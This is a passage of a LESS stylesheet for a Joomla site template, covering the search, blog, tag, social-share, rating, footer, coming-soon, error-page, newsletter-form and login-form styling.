*======= 	Start  (Joomla) Search	   ============
*=======================================*/
.search {
	input#mod-search-searchword {
		width:100%;
		border-radius:4px;
		&:focus {
			box-shadow:none;
		}

	}
	button[name="Search"] {
		position:absolute;
		right:-19px;
		border-radius:0 4px 4px 0;
		line-height:1;
		width:42px;
		height:34px;
		padding-left:5px;
		padding-right:4px;
		.fa-search {
			font-size:110%;
			vertical-align:top;
			line-height:1.1;
		}
	}
	
	/* icon fa-search */
	&.flex-search {
		&:before {
			/* FontAwesome 5 in Flex 3.9 */
			font-family:'Font Awesome 5 Free';
			content:"\f002";
			font-weight:900;
			position:relative;
			z-index:1;
			margin-bottom:-42px;
			float:right;
			right:12px;
			line-height:2.2;
			padding-left:3px;
			text-align:center;
			vertical-align:middle;
			opacity:0.9;
			.transition(all .3s ease-in-out);
		}
		&:hover:before,
		&:focus:before,
		&:active:before {
			opacity:0.2;
			content:"\f00e";
			font-weight:900;
			-webkit-transform: rotate(90deg);
			-moz-transform: rotate(90deg);
			-ms-transform: rotate(90deg);
			-o-transform: rotate(90deg);
			transform: rotate(90deg);
		}
	}
	.btn-toolbar {
		margin-bottom: 20px;
		span.icon-search {
			margin: 0;
		}
		button {
			color: #fff;
		}
	}

	.phrases {
		.phrases-box {
			.controls{
				label {
					display: inline-block;
					margin: 0 20px 20px;
				}	
			}
		}

		.ordering-box {
			margin-bottom: 15px;
		}
	}

	.only {
		label {
			display: inline-block;
			margin: 0 20px 20px;	
		}
	}

	.search-results {

		dt.result-title {
			margin-top: 40px;	
			font-size:110%;
			
			> a {
				+ i.fa-link {
					font-size:90%;
					color:#909090;
					line-height:1.1;
					margin-left:-5px;
					opacity:0;
					.transition(all .2s ease-in-out);
				}
				&:hover {
					+ i.fa-link {
						opacity:1;
						margin-left:3px;
					}
				}
			}
			
		}
	
		dt,dd {
			margin: 5px 0;
		}
		.result-created {
			margin:10px 0 0;
			font-size:90%;
		}
	}
	span.highlight {
		background: #9BCC56;
		color: #fff;
		padding:0 3px;
	} 
	
}

.filter-search {
	.chzn-container-single {
		.chzn-single {
			height:34px;
			line-height:34px;
		}
	}
}

.form-search {
	.finder {
		label {
			display: block;
		}

		.input-medium {
			width: 60%;
			border-radius: 4px;
		}
	}
}

.finder {
	.word {
		input {
			display: inline-block;
		}
	}

	.search-results.list-striped {
		li {
			padding: 20px 0;
		}
	}
}

/* End  Search
*=======================================*/

// Final Fix for jQuery Select
.chzn-container-single {
	.chzn-single {
		div b {
			background: none!important;
			color:#999;
			
			&:after {
				content:"\f0d7";
				font-family:"Font Awesome 5 Free";
				font-weight:900;
				width:18px;	
				height:29px;	
				line-height:29px;		
				position:absolute;	
				right:0;	
				top:0;
				
			}
		}
	}
}

.chzn-container-active.chzn-with-drop .chzn-single div b:after {
	content:"\f0d8";
	font-family:"Font Awesome 5 Free";
	font-weight:900;
}
.chzn-container-single .chzn-drop,
.chzn-container-single .chzn-search input[type="text"],
.chzn-container-single .chzn-drop {
	min-width:100%;
}


/*=========================================
*======= 	Start  Blog	   ============
*=======================================*/
.article-info {
	margin:0;
	padding-top:12px;
	line-height: 12px;

	>dd{
		display: inline-block;
		font-size: 12px;
		line-height: 20px;
		color: #666;
		margin: 0 5px;
		>i,
		>span.fa-eye, >span.far.fa-eye {
			display: inline-block;
			margin-right:2px;
		}
		.voting-symbol {
			margin-left:3px;
		}
	}
}

article {
	&.item {
		//margin-bottom: 50px;
	}
}
// Tags
.tag-category {
	.btn-group.pull-right {
	  margin-right:10px;	
	}
	table.category {
		margin:30px auto;
	}
	ul.category {
		padding:40px 0;
		li {

			.sp-module {
				margin:0;
			}
			
			h3 {	
				>a {
					font-size:115%;
					line-height:1.3;
				}
				
			}
			>.tag-body {
				margin:5px 0 0 0;
			}
			>.tag-img {
				margin:5px 25px 5px 0;
				width:33%;
				
				
				.overlay {
					position:relative;
					&:before {
						content:"";
						opacity:0;
						width:100%;
						height:100%;
						position:absolute;
						background:rgba(0,0,0,.1);
						box-shadow:inset 0 0 25px rgba(0,0,0,.15), inset 0 0 0 5px rgba(0,0,0,.1);
						-webkit-transition: all .3s ease-in-out;
						transition: all .3s ease-in-out;	
						
					}
					i {
						position:absolute;
						opacity:0;
						color:#fff;
						font-size:20px;
						line-height:1;
						padding:10px 11px;
						margin:-10px 0 0 -20px;
						border-radius:3px;
						text-align:center;
						vertical-align:middle;
						top:50%;
						left:50%;
						background:rgba(0,0,0,.5);
						-webkit-transition: all .3s ease-in-out .1s;
						transition: all .3s ease-in-out .1s;
					}
					
					&:hover {
					
						&:before {
							opacity:1;
						}
						i {
							opacity:1;
							margin:-19px 0 0 -21px;
						}
					}
				}
					
			}
			&:last-child {
				border-bottom:none;
			}
		}

	}
}
.tags {
	font-size:90%;
	padding-top:10px;
	float:left;
	margin:7px 20px 0 0;
	>span {
		>i {
			margin:0 5px 0 3px;
		}
	}
	&:hover {
		>span {
			>i {
				.transition(all .3s ease-in-out);
			}
		}
	}
	>a {
		margin-right:5px;
	}
}

.readmore {
	margin:0 20px 0 0;
	float:left;
}

.helix-social-share{
	.helix-social-share-blog{
		margin-top: 11px;
		float: left;
		display:table;
		
		ul{
			padding: 6px;
			list-style: none;
			margin: 0;
			background:#eee;
			border-radius: 3px;
			
			li{
				display: inline-block;
				margin-right: 4px;
				
				&:last-child{
					margin-right: 0;
				}
				
				a {
					font-size: 14px;
					display: inline-block;
					text-align:center;
					text-transform: none;
					border-radius:2px;
					color:#fff;
					.transition(all .3s ease-in-out);
					
					
					> i {
						height: 24px;
						width:26px;	
						line-height: 24px;
					}

					&.facebook{
						background-color: #3b5998;  
					}
					&.twitter{
						background-color: #1da1f2;	
					}
					&.google-plus{
						background-color: #dd4b39;
					}
					&.linkedin{
						background-color: #00a0dc;
					}
		
					&:hover {
						background-color: #555;
					}
					
					
				}
				
			}
		}
		
		&.helix-social-share-article {
			margin-top: 9px;
			
			ul{
				padding: 2px;
				margin: 0;
				background:transparent;
				border-radius: 3px;
				
				li{
					display: inline-block;
					margin-right: 4px;

					
					a {
						font-size: 14px;
						border-radius:3px;
						color:#fff;
						
						> i {
							height: 24px;
							width:24px;	
							line-height: 24px;
							font-size: 17px;
							text-align:center;
						}
						&.facebook,
						&.twitter{
							padding:5px 20px 5px 18px;
						}
						&.google-plus,
						&.linkedin{
							padding:5px 10px;
						}
						
					}
				}
			}
		}
	}
}


//Article Voting
.content_rating,
.content_rating + form {
	display: none;
}

.voting-symbol{
	unicode-bidi: bidi-override;
	direction: rtl;
	font-size:1em;
	display: inline-block;

	span.star {
		/* FontAwesome 5 in Flex 3.9 */
		font-family:'Font Awesome 5 Free';
		font-style: normal;
		display: inline-block;
		

		&.active:before{
			//content: "\f005";
			font-weight:900;
		}

		&:before{
			content: "\f005";
			font-style:normal;
			font-weight:400;
			padding-right: 0.3em;
		}

	}
}

.sp-rating {

	span.star:before,
	span.star ~ span.star:before {
		-webkit-transition: all .3s ease-in-out;
		transition: all .3s ease-in-out;
	}

	span.star:hover:before,
	span.star:hover ~ span.star:before {
		//content: "\f005";
		cursor: pointer;
		font-weight:900;
	}
}

.post_rating {
	margin-bottom: 20px;
	.ajax-loader,
	.voting-result {
		display: none;
	}
}

.entry-image,
.entry-gallery,
.entry-video,
.entry-audio,
.entry-link,
.entry-status,
.entry-quote {
	margin-bottom: 30px;
	position:relative;
}

.entry-image .img-caption-overlay {
	background:rgba(0,0,0,.6);
	background:linear-gradient(rgba(0,0,0,.4), rgba(0,0,0,.6));
	color:#fff;
	padding:5px 15px;
	display:block;
	position:absolute;
	bottom:0;
	left:0;
	right:0;
}

.has-post-format-masonry {
	position: absolute;
	.post-format-masonry {
		position: absolute;
		z-index:2;
		top: 7px;
		left: 8px;
		width: 24px;
		height: 24px;
		
		> i {
			font-size: 14px;
			width: 24px;
			height: 24px;
			line-height: 24px;
			text-align: center;
			color: #fff;
			margin:0 auto;
			border-radius: 2px;

		}
	}
	
}

.entry-header {
	position: relative;
	margin-bottom: 25px;

	&.has-post-format {
		margin-left: 62px;
		
		.post-format {
			position: absolute;
			top: 3px;
			left: -62px;
			display: block;
			width: 48px;
			height: 48px;
			font-size: 24px;
			line-height: 48px;
			text-align: center;
			color: #fff;
			border-radius: 3px;
		}
	}

	h1 {
		font-size:225%;
		font-weight:300;
	}

	h1, h2 {
		margin:0;
		line-height: 1.2;
		width:auto;
		padding-right:30px;
		box-shadow: inset 0 -1px 0 #ddd;
		display:table;
		word-wrap: break-word;

		&:after{
			clear: both;
			display:block;
			float:left;
			content:"";
			position:relative;
			height:2px;
			width:70%;
			margin:10px 30% 0 0;
			border-radius:2px;
			padding: 0;
		}
	}
}


.entry-link {
	padding: 50px;
	position: relative;
	z-index:0;
	border-radius:4px;
	
	a {
		h4 {
			margin: 0;
			font-size: 36px;
			line-height:1.5;
			color: #fff;
			&:hover {
				color:rgba(255, 255, 255, 0.85);
			}			
		}
	}

	&:before {
		position: absolute;
		right: -20px;
		font-size: 200px;
		/* font-family: FontAwesome; */
		font-family:'Font Awesome 5 Free';
		content: "\f0c1";
		font-weight:900;
		transform: rotate(180deg);
		top:85px;
		color: rgba(255, 255, 255, 0.1);
		z-index: -1;
	}
}

.entry-quote {
	position: relative;
	padding: 50px;
	border-radius:4px;
	color:rgba(255, 255, 255, 0.9);
	z-index:0;
	
	&:before {
		position: absolute;
		right: -10px;
		font-size: 200px;
		/* font-family: FontAwesome; */
		font-family:'Font Awesome 5 Free';
		content: "\f10e";
		font-weight:900;
		transform: rotate(320deg);
		top:120px;
		color: rgba(255,255,255,0.1);
		z-index: -1;
	}

	blockquote small {
		color: #FFF;
		font-weight: 600;		
		font-size: 20px;
	}

	blockquote {
		padding: 0;
		margin: 0;
		font-size: 16px;
		border: none;
		.fa-quote-left {
			margin-right:7px;
		}
		.fa-quote-right {
			margin-left:7px;
		}
	}
}

.newsfeed-category {
	.category {
		list-style: none;
		padding: 0;
		margin: 0;

		li {
			padding: 5px 0;
		}
	}

	#filter-search {
		margin: 10px 0;
	}
}

.category-module,
.categories-module,
.archive-module,
.latestnews,
.newsflash-horiz,
.mostread,
.form-links,
.list-striped {
	list-style: none;
	padding: 0;
	margin: 0;

	li {
		padding: 2px 0;

		h4 {
			margin: 5px 0;
		}
	}
}

/* End  Blog	
 *=======================================*/


/*=========================================
*======= 	Start  Bottom	   ============
*=======================================*/
#sp-bottom {

	.sp-module {
		.sp-module-title {
			text-transform:none;
			font-weight:400;
			font-size:24px;
		}
	}
}
/* End  Bottom	
 *=======================================*/


/*=========================================
*======= 	Start  Footer	   ============
*=======================================*/
footer {
  margin-top: auto; /* sticky footer at the bottom */
} 
#sp-footer {
	color: #fff;
	text-align: center;
	padding: 20px 0;

	a {
		color: rgba(255, 255, 255, 0.9);
		&:hover {
			color: #fff;
		}
	}
}

#sp-footer-wrapper {
	ul {
		display:inline-block;
		&.nav {
			display:inline-block;
			list-style:none;
			padding:0;
			margin:0 5px;
			li {
				display:inline-block; 
				margin:0 5px;
				a {
					display:block;
					&:hover{
						background:none;
					}
				}
			}
		}
	}
	
	.helix-framework {
		display:inline-block;

	}

	.copyright {
		display:block;
	}	
}
/* End  Footer	
 *=======================================*/


/*=========================================
*======= 	Start  Coming Soon	   ============
*=======================================*/
.sp-comingsoon {

	width: 100%;
	height: 100%;
	min-height: 100%;

	body {
		width: 100%;
		height: 100%;
		min-height: 100%;
		color: #fff;
		

		#sp-comingsoon,
		.sp-comingsoon-wrap {
			z-index:1;
			position:relative;
		}
		

		
		a.logo {
			padding:25px;
			width: 100%;
			text-align:center;
			display:table;
			margin:0 auto 0;
			background: rgba(20,20,20,.6);
			box-shadow:0 30px 200px rgba(0,0,0,.2);
			
				img.sp-default-logo {
					text-align:center;
					margin:0 0 0 -140px;
					padding:5px;
					display:inline-table;
					-webkit-transition: all 300ms .4s;
					transition: all 300ms .4s;
				}
				div.backhome {
					margin:0 auto;
					text-indent:-20px;
					padding:0 5px;
					font-size:17px;
					color:#ddd;
					line-height:20px;
					display:inline-block;
					opacity:0;
					-webkit-transition: all 500ms .5s;
					transition: all 500ms .5s;
				}
				
		+ .fa-clock-o, + .far.fa-clock {
			height:auto;
			position:fixed;
			overflow:hidden;
			top:28%;
			left:50%;
			margin:0 0 0 -184px;
			text-align:center;
			font-size:430px;
			color: rgba(0,0,0,.12);
			opacity:0.4;
			z-index:0;
			-webkit-transition: transform .7s .7s, opacity .7s .8s;
			transition: transform .7s .7s, opacity .7s .8s;
			-ms-transform: rotate(30deg);
			-webkit-transform: rotate(30deg);
			transform: rotate(30deg);
		}
		
			&:hover {
				background: rgba(0,0,0,.6);

				img.sp-default-logo {
					text-align:center;
					margin:0 0 0 10px;
				}
				
				div.backhome {
					text-indent:-20px;
					opacity:1;
				}
				+ .fa-clock-o, + .fa-clock {
					opacity:0.6;
					-ms-transform: rotate(-400deg);
					-webkit-transform: rotate(-400deg);
					transform: rotate(-400deg);
				}

			}

		}
	}

	.sp-comingsoon-title {
		margin: 60px auto 0;
		font-size: 370%;
		font-weight: 300;
	}

	.sp-comingsoon-content {
		margin: 20px auto 0;
		font-size: 26px;
		font-weight: 300;
		
	}

	.days,
	.hours,
	.minutes,
	.seconds{
		display: inline-block;
		margin: 70px 15px;
	}

	.days .number,
	.hours .number,
	.seconds .number,
	.minutes .number{
		width: 125px;
		height: 120px;
		line-height: 120px;
		border: 1px solid fade(white, 50%);
		border-radius: 4px;
		display: inline-block;
		font-size: 48px;
		font-weight: 100;
		background-color: fade(black, 7%);
	}

	.days .string,
	.minutes .string,
	.seconds .string,
	.hours .string{
		display: block;
		font-size: 18px;
		margin-top: 10px;
	}

	.social-icons {
		li {
			display: inline-block;
			margin: 25px 15px 40px;

			a {
				color: rgba(255, 255, 255, 0.7);
				font-size: 24px;
				-webkit-transition: color 400ms;
				transition: color 400ms;
	
				&:hover {
					color: #fff;
				}
			}
		}
		&.with-bckg-img {
			.social-icons {
				margin:15px auto;
				padding: 3px 5px;
				border-radius:5px;
				li {
					display: inline-table;
					margin: 5px 15px 2px;
				}
			}
		}
	}
}
/* End  Comingsoon	
 *=======================================*/


/*=========================================
*======= 	Start  Error Page	   ============
*=======================================*/
.error-page {
	width: 100%;
	height: 100%;
	min-height: 100%;

	body {
		width: 100%;
		height: 100%;
		min-height: 100%;
	}

	.error-page-inner {
		height: 100%;
		min-height: 100%;
		width: 100%;
		display: table;
		text-align: center;
		>div.container {
			display: table-cell;
			vertical-align: middle;
			.btn-error {
				background:lighten(@major_color, 5%);
				color:#fff;
				margin:25px auto 40px;
				>i {
					margin-right:5px;
				}
				&:hover{
					background: @major_color;
				}
			}
				.fa-exclamation-triangle {
					font-size: 64px;
					line-height: 1;
					margin-bottom:0;
					color:lighten(@major_color, 15%);
				}
			
				.error-code {
					font-weight: 100;
					font-size: 120px;
					line-height: 1;
					color:lighten(@major_color, 10%);
					margin: -10px 0 30px 0;
					padding: 0;
				}
				.error-code-message {
					font-weight: 300;
					font-size: 40px;
					color:#777;
					line-height: 1;
					margin: 20px 0;
					padding: 0;
				}
			
				.error-message {
					font-size: 24px;
					line-height: 1;
					color:#aaa;
					margin-bottom: 30px;
				}
		}
		&.with-bckg-img {
			div.container {
				.pe-7s-compass {
					font-size: 100px;
					font-weight: 100;
					color:#fff;
					text-shadow: 1px 3px 6px fade(black, 10%);
				}
				.error-code {
					font-weight: 300;
					font-size: 130px;
					color:lighten(@major_color, 5%);
					margin: -15px 0 30px 0;
				}
				.error-code-message {
					font-weight: 300;
					font-size: 50px;
					color:#fff;
					margin: 20px 0;
					text-shadow: 2px 3px 6px fade(black, 25%);
				}
			
				.error-message {
					font-size: 24px;
					line-height: 1;
					color:#fff;
					text-shadow: 1px 2px 4px fade(black, 25%);
				}
			}
		}
	}
}
/* End  Error Page	
 *=======================================*/


/*=========================================
*======= 	Start  Mixed CSS   ==========
*=======================================*/
.sp-social-share {
	ul{
		display: block;
		padding: 0;
		margin: 20px -5px 0;

		li{
			display: inline-block;
			font-size: 24px;
			margin: 0 5px;
		}
	}
}


// profile
.dl-horizontal {
	dt {
		margin: 8px 0;
		text-align: left;
	}
}


// page-header
.page-header {
	padding-bottom: 15px;
}

// featured contact
table.category {

	width: 100%;
	thead,
	tbody{
		>tr {
			border: 1px solid #f2f2f2;	
			th,td {
				padding: 10px;
			}
		}
	}
}

//contact from
.contact-form {
	.form-actions {
		background: none;
		border: none;
	}
}

// sp portfolio
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover{
	color:#fff;
}


// Carousel (Post)
.entry-gallery.carousel {
	.carousel,
	.carousel-inner, 
	.carousel-inner .item {
		height: 100%;
	}


	.carousel-left,
	.carousel-right {
		position: absolute;
		top: 50%;
		font-size: 24px;
		width: 36px;
		height: 36px;
		line-height: 34px;
		margin-top: -18px;
		text-align: center;
		color: #fff;
		background: rgba(0, 0, 0, 0.2);
		border-radius: 4px;
	
		&:hover,
		&:focus {
			color: #fff;
		}
		
		>.fa, >.fas, >.far {
			width:32px;
			text-align:center;
		}
	}
	
	.carousel-left {
		left: 10px;
		padding-right:1px;
	}
	
	.carousel-right {
		right: 10px;
		padding-left:3px;
	}
	
	&:hover {	
		.carousel-left,
		.carousel-right {
			&:hover {
				background: rgba(0, 0, 0, 0.4);
			}
		}
	}
	/* Carousel Fade effect */
	&.carousel-fade {
		.carousel-inner {
			.item {
				width:100%;
				transition-property: opacity;
				/*.transition(.6s cubic-bezier(0.65,0,0.35,1));*/
			}
			
			.item,
			.active.left,
			.active.right {
				opacity: 0;
			}
	
			.active,
			.next.left,
			.prev.right {
				opacity: 1;
			}
	
			.next,
			.prev,
			.active.left,
			.active.right {
				left: 0;
				transform: translate3d(0, 0, 0);
			}
		}
	
		.carousel-control {
			z-index: 2;
		}
	}

}


/* option to make pixeden icons bold */
.bold {
	i.pe {
		font-weight:600;
	}
	.sppb-btn {
		i {
			&.pe {
				font-weight:600;
			}
		}
	}
}


/* Desaturate effect for hover images */
.desaturate {
	li {
		&:hover {
			.overlay {
			  -webkit-filter:none;
			}
		}
	}
	a { 
		img {
			&:hover {
				.transition(all .5s ease-in-out);
				-webkit-filter: grayscale(100%);
				-moz-filter: grayscale(100%);
				-ms-filter: grayscale(100%); 
				-o-filter: grayscale(100%);
				filter: grayscale(100%);
				filter: url("data:image/svg+xml;utf8,<svg version='1.1' xmlns='http://www.w3.org/2000/svg' height='0'><filter id='greyscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0' /></filter></svg>#greyscale");
				filter: gray;
				-webkit-filter: grayscale(1);
			}
		}
	&:hover {
		overflow:hidden;
			>img.desaturate{			
				.transition(all .5s ease-in-out .1s);
				-webkit-filter: grayscale(100%) brightness(1.3);
				-moz-filter: grayscale(100%) brightness(1.3) blur(1px);
				-ms-filter: grayscale(100%) brightness(1.3) blur(1px); 
				-o-filter: grayscale(100%) brightness(1.3) blur(1px);
				filter: grayscale(100%) brightness(1.3) blur(1px);
				filter: url("data:image/svg+xml;utf8,<svg version='1.1' xmlns='http://www.w3.org/2000/svg' height='0'><filter id='greyscale'><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0' /></filter></svg>#greyscale");
				filter: gray;
				/*-webkit-filter: grayscale(1);*/
			}			
		}	
	}
}

/* ----- Scroll to Top ----- */
a#scroll-top {
	opacity:0;
	-moz-opacity:0;
	-webkit-opacity:0;
	filter:alpha(opacity=0);
	visibility:hidden;
	position:fixed;
	right:-40px;
	bottom:1px;
	height:54px;
	width:54px;
	line-height:54px;
	border-radius:4px;
	background:transparent;
	z-index:9;
	.transition(all .7s cubic-bezier(0.405, 0.020, 0.325, 0.950) .2s);

	&.open {
		right:10px;
		opacity:0.8;
		-moz-opacity:0.8;
		-webkit-opacity:0.8;
		filter:alpha(opacity=80);
		visibility:visible;
	}
	>i {
		color:#777;
		height:56px;
		width:56px;
		line-height:1;
		text-align:center;
		font-size:56px;
		.transition(all .3s ease-in-out);
	}
	&:hover {
		opacity:1;
		-moz-opacity:1;
		-webkit-opacity:1;
		filter:alpha(opacity=100);
		>i {
			color:#333;
		}
	}

}

/* iframe video */
.flex-video {
	position: relative;
	
	padding-top: 45px;
	padding-bottom: 56.4%;
	height: 0;
	overflow: hidden;
		&.widescreen { padding-bottom: 50%; }
		&.flex-video.vimeo { padding-top: 0; }
		&.flex-video.youtube{ padding-top: 0; }
		&.flex-video.html5{ padding-top: 0; }
		&.flex-video .video-js{ width:100%;}
		iframe{ border:none;outline:none;margin-top:-1px;}
		iframe, object, embed {
			position: absolute;
			top: 0;
			left: 0;
			width: 100%;
			height: 100%;
		}
}

/* AP Smart LayerSlider */
.sp-layer {
	.btn {
		border-radius:7px;
		margin-right:10px;
		font-size:210%;
		line-height:1.5;
		padding:14px 50px 15px;
	}
}

/* AcyMailing Module */
.acymailing_form {
	position:relative;
	width:100%;
	input.inputbox {
		background:transparent;
	}
	
	.acysubbuttons{
		position:absolute;
		top:-20px;
		right:-10px;
		overflow:hidden;
		
		input {
			text-indent:-9999px;
			padding:0;
			border:none;
			width:44px;
			height:34px;
			border-radius:0 4px 4px 0;
		}
		
		&::before{
			font-family: "peIcon7";
			content:"\e639";
			width:34px;
			font-size:110%;
			text-align:center;
			color:#fff;
			position:absolute;
			top:50%;
			left:50%;
			transform:translate(-50%,-50%);
			pointer-events:none;
			.transition(all .2s ease);
			
		}
		&:hover {
			&::before{
				font-family: "peIcon7";
				content:"\e63a";
				transform:translate(-50%,-56%);
			}
		}	
	}
	
	.acyterms,
	.fieldacyterms {
		input {
			display:inline-block;
			margin-right:5px;
		}
	}
}
.dark {
	.acymailing_form {
		input.inputbox {
			opacity:.8;
		}
	}
	.acym_module_form {
		input.cell {
			background:transparent;
		}
	}
}

/* Acymailing Module (from version 6.x) */
.acym_module_form {
	
	position:relative;
	
	input.cell {
		width:100%;
		background:transparent;
	}
	
	.btn {
		margin:0 auto;
	}
	
	.acysubbuttons-icon {	
		position:absolute;
		top:0;
		right:0;
		color:yellow;
		
		
		input.icon_button_subscribe {
			padding:0;
			border:none;
			width:44px;
			height:34px;
			line-height:44px;
		}
	
		&::before{
			font-family: "peIcon7";
			content:"\e639";
			position:absolute;
			top:0;
			right:0;
			width:42px;
			height:34px;
			line-height:34px;
			font-size:110%;
			text-align:center;
			color:#fff;
			pointer-events:none;
			border-radius:0 4px 4px 0;
			
		}	
	}	
}

	

#system-message-container{
	.alert-error{
		color: #a94442;
		background-color: #f2dede;
		border-color: #ebccd1;
	
	}
}
/*=========================================
*======= 	Start  Login Form	 =========
*=======================================*/
.login, .registration, .registration-wrapper, .form-validate {
	
	.login-description {
		margin-bottom: 30px;
	}

	.form-group {
		margin-bottom: 20px;
		
		.group-control {
			input {
				min-height:40px;
			}
		}
	}

	.form-links {
		display: inline-block;
		margin: 0 10px;

		a {
			font-weight: 600;
		}
	}

	.form-footer {
		margin: 30px auto;
		padding-top: 20px;
		border-top: 1px solid #e5e5e5;
		text-align: center;
	}

	img {
		display: inline-block;
		margin: 20px 0;
	}
	
	.title{
		
		margin:35px auto;
		
		i.pe {
			font-size:36px;
			line-height:37px;
			vertical-align:top;
			margin:-1px 8px 0 0;
		}
	}
	fieldset {
		
		margin:35px auto 15px;
		
		&:first-child {
			margin:10px auto;
		}
			
		.field-calendar {

			button.btn {
				margin-top:1px;
				box-shadow: 0 0 0 1px #ccc;
				background:#f8f8f8;
				
				&:hover {
					box-shadow: 0 0 0 1px #bbb;
					background:#f5f5f5;
				}
			}
			
			.icon-calendar {
				&:before {
					font-family:'Font Awesome 5 Free';
					content:"\f073";
					font-style:normal;
					font-weight:400;
					font-size:1.25em;
					line-height:1.05;
					//margin:-2px 6px 0 0;
					color:#777;
					text-shadow:0 1px 0 #fff;
				}
			}
			
			.calendar-container table {
				max-width: 300px;
			}
		}
	}
	
	
	/* Fix for TOS ("Terms of Service") in Registration */
	label#jform_profile_tos-lbl, #jform_terms_terms-lbl, #jform_consentbox-lbl {
		position:relative;
		margin:4px 20px 0 0;
		float:left;
		display:inline-block;
	
		a {
			display:inline-table;
			position:relative;
			color:@text_color;
			padding:2px 1px;
			
			&:before {
				font-family:'Font Awesome 5 Free';
				content:"\f15c";
				font-style:normal;
				font-weight:400;
				font-size:1.1em;
				line-height:1.2;
				margin:-4px 6px 0 0;
				color:#888;
			}
			
			&:hover, &:hover:before {
				color:@major_color;
			}
		}
		span.star {
			//color:red;
		}
		
		& ~ div {
			margin:15px 0 25px;
		}
	
	}
	
	/* Privacy Consent (from Joomla 3.9) */
		label#jform_privacyconsent_privacy-lbl {
			position:relative;
			margin:4px 20px 0 0;
			float:left;
			display:inline-block;

		
			a {
				display:inline-table;
				position:relative;
				color:@text_color;
				padding:2px 1px;
				
				
				&:before {
					font-family:'Font Awesome 5 Free';
					content:"\f15c";
					font-weight:400;
					font-size:1.1em;
					line-height:1.2;
					margin:-4px 6px 0 0;
					color:#888;
				}
				
				&:hover, &:hover:before {
					color:@major_color;
				}
			}
			span.star {
				position:relative;
			}
			
		}
	/* TOS Fieldset */
	#jform_profile_tos, #jform_privacyconsent_privacy, #jform_terms_terms {
	
		input[type="radio"] {
			opacity: 0;
			visibilty:hidden;
			margin:8px 0 0 3px;
			-webkit-user-select: none;
			-moz-user-select: none;
			-ms-user-select: none;
			user-select: none;
		}
		
		label {
			position: relative;
			display: inline-block;
			padding: 2px 8px;
			text-indent:18px;
			
			&::before,
			&::after {
				position: absolute;
				content: "";
				display: inline-block;
				.transition(all .3s ease);
			}
			
			/* Outer box of the fake checkbox*/
			&::before{
				height: 18px;
				width: 18px;
				border: 1px solid #aaa;
				border-radius: 3px;
				left: 0px;
				top: 6px;
			}
			
			/* fake checkbox */
			&::after{
				height: 6px;
				width: 11px;
				border:0;
				border-left: 2px solid white;
				border-bottom: 2px solid white;
				box-shadow:0 1px 0 0 rgba(0,0,0,0.25);
				transform: rotate(-45deg);
				left: 4px;
				top: 11px;	
			}
			&:hover {
				&::before{
					border: 1px solid @major_color;
				}
			}
		}
		
		/*Hide the checkmark by default*/
		input[type="radio"] + label::after {
			content: none;
		}
		
		/*Unhide on the checked state*/
		input[type="radio"]:checked + label::after {
			content: "";
		}
		
		/*Adding focus styles on the outer-box of the fake checkbox*/
		input[type="radio"]:checked + label::before {
			background:lighten(@major_color, 10%);
			border: 1px solid darken(@major_color, 10%);
		}	
	}
}

/* Some fixes for SqueezeBox (iframe popup) */
#sbox-window {
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	border-radius: 5px;
	padding:0;
}
.sbox-content-iframe#sbox-content, .sbox-content-iframe{
	overflow-y:hidden;
	padding:3%;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	border-radius: 5px;
}

#sbox-content iframe {
	width:100%;
}

/* Fix for Joomla 3.9.0 - hidding Joomla's rating/voting */
.content_rating, .unseen.element-invisible, span.content_vote {
	visibility:hidden;
	display:none;
	
	~ img {
		visibility:hidden;
		display:none;
	}
}
img[src$="rating_star.png"],
img[src$="rating_star_blank.png"] {
	visibility:hidden;
	display:none;
}

/* Checkbox (custom) */
#login, #login-form, .login {

	input[type="checkbox"] {
		opacity: 0;
		visibility:hidden;
		position:absolute;
		-webkit-user-select: none;
		-moz-user-select: none;
		-ms-user-select: none;
		user-select: none;
		width:1px;
		height:1px;
	}
	
	label {
		position: relative;
		display: inline-block;
		vertical-align:middle;
		padding: 2px 8px;
		text-indent:18px;
		cursor: pointer;
		
		&::before,
		&::after {
			position: absolute;
			content: "";
			//display: inline-block;
			.transition(all .3s ease);
		}

		&::before{
			height: 18px;
			width: 18px;
			border: 1px solid #aaa;
			border-radius: 3px;
			left: 0;
			top: 5px;
		}
		
		&::after{
			height: 6px;
			width: 11px;
			border:0;
			border-left: 2px solid white;
			border-bottom: 2px solid white;
			box-shadow:0 1px 0 0 rgba(0,0,0,0.25);
			transform: rotate(-45deg);
			left: 4px;
			top: 10px;	
		}
		&:hover {
			&::before{
				border: 1px solid @major_color;
			}
		}
	}
	
	input[type="checkbox"] + label::after {
		content: none;
	}
	
	input[type="checkbox"]:checked + label::after {
		content: "";
	}
	
	input[type="checkbox"]:checked + label::before {
		background:lighten(@major_color, 10%);
		border: 1px solid darken(@major_color, 10%);
	}										
}

/* Bootstrap's Checkbox */
.checkbox {

	label {

		cursor: pointer;
		
		input[type="checkbox"] {
			-webkit-appearance: none;
			-moz-appearance: none;
			appearance: none;
			visibility:hidden;
			width: 22px;
			height: 18px;
			line-height:1;
			top:3px;
			background:transparent;
			border:none;
			outline:none;
			cursor: pointer;
			position:relative;
			  
		  
		  	&::before,
			&::after {
				position: absolute;
				content: "";
				//display: inline-block;
				.transition(all .3s ease);
			}
			&::before{
				visibility: visible;
				opacity:1;
				height: 18px;
				width: 18px;
				border: 1px solid #aaa;
				border-radius: 3px;
				left: 0;
				top: 0;
			}
			
			&::after{
				visibility: hidden;
				opacity:0;
				height: 6px;
				width: 11px;
				border:0;
				border-left: 2px solid white;
				border-bottom: 2px solid white;
				box-shadow:0 1px 0 0 rgba(0,0,0,0.25);
				transform: rotate(-45deg);
				left: 4px;
				top: 5px;	
			}
			
			&:hover {
				&::before{
					border: 1px solid @major_color;
				}
			}
			
			&:checked {
				&::before {
					background:lighten(@major_color, 10%);
					border: 1px solid darken(@major_color, 10%);
					visibility: visible;
					opacity:1;
				}
				&::after{
					visibility: visible;
					opacity:1;
				}
			}
		}
	}									
}

.form-links{
	ul {
		list-style: none;
		padding: 0;
		margin: 0;
	}
}
/* End  Login Form
*=======================================*/
